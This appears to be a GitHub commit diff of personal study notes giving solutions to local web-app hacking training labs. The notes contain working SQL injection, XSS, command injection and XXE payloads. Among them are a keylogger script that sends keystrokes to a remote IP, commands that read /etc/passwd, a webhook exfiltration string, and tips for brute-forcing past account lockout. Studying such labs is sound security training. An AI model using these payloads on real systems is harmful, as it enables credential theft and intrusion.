Skip to content

Commit

Permalink
Web app - SQL injection notes
Browse files Browse the repository at this point in the history
  • Loading branch information
@syselement
syselement committed Feb 24, 2025
1 parent 14b7628 commit 7b26ace
Show file tree
Hide file tree
Showing 8 changed files with 361 additions and 80 deletions.
Binary file added peh/6-webapp/.gitbook/assets/2025-02-24_22-12-54_904.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added peh/6-webapp/.gitbook/assets/2025-02-24_22-39-27_905.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added peh/6-webapp/.gitbook/assets/2025-02-24_22-43-34_906.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added peh/6-webapp/.gitbook/assets/2025-02-24_22-46-18_907.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added peh/6-webapp/.gitbook/assets/2025-02-24_23-01-58_909.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
145 changes: 68 additions & 77 deletions peh/6-webapp/1-web-lab.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -19,14 +19,17 @@ sudo /opt/pimpmykali/pimpmykali.sh
# Run menu option E for the WebApp Labs
# The labs start automatically

# To START the labs
cd $HOME/peh/labs
./start-peh-labs.sh

# To (only) STOP the labs
sudo docker stop $(sudo docker ps -aq)

# To STOP and CLEANUP the labs
cd $HOME/peh/labs
./cleanup-peh-labs.sh
# This script removes ALL DOCKER CONTAINERS and NETWORKS!!!

# To START the labs
cd $HOME/peh/labs
./start-peh-labs.sh
```

- Run Burp Suite and open its proxy browser
Expand All @@ -37,35 +40,23 @@ cd $HOME/peh/labs

> # Lab solutions
>
> ## Injection0x01
>
> - basic SQLi
>
> ## Injection0x02
>
> - login as jeremy:jeremy
> - check the cookie used as a session token
> - break it by adding a '
> - notice the page doesn't show the welcome message now that there is a SQL error
> - write a script to extract jessamy's password
>
> ## Injection0x03
>
> - sushi shop
> - product search
>- product search
> - UNION select to enum other tables
> - find creds & login
>
>- find creds & login
>
> ### solutions:
>
>
> `Tanjyoubi Sushi Rack' UNION SELECT username,password,null,null from injection0x03_users-- -`
>
> ## XSS 0x01
>
> `<img src=x onerror=alert(1);>`
>
>
>## XSS 0x01
>
>`<img src=x onerror=alert(1);>`
>
> ## XSS 0x02
>
>
> `<img src=x onerror=alert(1);>`
>
> `<script>function logKey(event){fetch("http://10.10.100.146:4444/e?c=" + event.key)} document.addEventListener('keydown', logKey);</script>`
Expand All @@ -75,91 +66,91 @@ cd $HOME/peh/labs
> ## Command Inj 0x01
>
> `https://tcm-sec.com; whoami; asd`
> `; cat /etc/passwd; asd`
>
> ## Command Inj 0x02
>
> `https://tcm-sec.com/& whoami& asd`
>`; cat /etc/passwd; asd`
>
>## Command Inj 0x02
>
>`https://tcm-sec.com/& whoami& asd`
> `https://tcm-sec.com/ | sleep 10 | asd`
>
> `https://webhook.site/<id>/?`whoami``
>
> ## Command Inj 0x03
>
> `45123)^2))}';whoami;#`
>
> ## File upload 0x01
>
> - Intercept
>
>## File upload 0x01
>
>- Intercept
> - Change contents
> - Or turn off JS
>
> ## File upload 0x02
>
> - Bypass the client-side again
> - Intercept and change the content-type to image/png or image/jpeg
>
> ## File upload 0x03
>
> - Bypass the client-side again
>- Intercept and change the content-type to image/png or image/jpeg
>
>## File upload 0x03
>
>- Bypass the client-side again
> - Intercept and change the content-type again
> - Use an extension that's not in the blocklist (.phtml)
>
> ## Authentication 0x01
>
> - Brute force
>
>
>## Authentication 0x01
>
>- Brute force
>
> ## Authentication 0x02
>
> - MFA code, switch username (code is OK for all users)
> - Or, just brute the code
>
>- Or, just brute the code
>
> ## Authentication 0x03
>
> - Account lockout after 5 attempts, therefore brute the top 4 passwords against a username list
>
> - common password list:
>
> ```
>
>- Account lockout after 5 attempts, therefore brute the top 4 passwords against a username list
>
>- common password list:
>
>```
> password
> password123
>password123
> letmein
> manchesterunited
> ```
>
> - common usernames list: `/usr/share/seclists/Usernames/Names/names.txt`
>
> ## XXE, IDOR, capstone
>
> ### XXE 0x01
>
>```
>
>- common usernames list: `/usr/share/seclists/Usernames/Names/names.txt`
>
>## XXE, IDOR, capstone
>
>### XXE 0x01
>
> ```
> <?xml version="1.0" encoding="UTF-8"?>
> <!DOCTYPE creds [
> <!ELEMENT creds ANY >]>
> <creds><user>username</user><password>pass</password></creds>
> ```
>
> ```
>```
>
>```
> <?xml version="1.0" encoding="UTF-8"?>
> <!DOCTYPE creds [
><!DOCTYPE creds [
> <!ELEMENT creds ANY >
> <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
> <creds><user>&xxe;</user><password>pass</password></creds>
> ```
>
>
> ### IDOR
>
>
> `fuzz the parameter`
>
> - find an admin user (or all of the admin users)
>
>
> ### Capstone
>
>
> SQLi to get into admin panel
> File upload to get RCE
>
> - XSS in the message alert
>
>- XSS in the message alert
> - XSS in account names probably? need to test
>
> - brute force user accounts
Expand All @@ -169,8 +160,8 @@ cd $HOME/peh/labs
> `http://localhost/capstone/coffee.php?coffee=3' or 1=1-- -`
>
> `http://localhost/capstone/coffee.php?coffee=1%27%20union%20select%20null,username,password,null,null,null,null%20from%20users--%20-`
>
> # To do list
>
>
># To do list
>
> - file upload capstone
> - auth0x03 testing
>- auth0x03 testing
Loading

0 comments on commit 7b26ace

Please sign in to comment.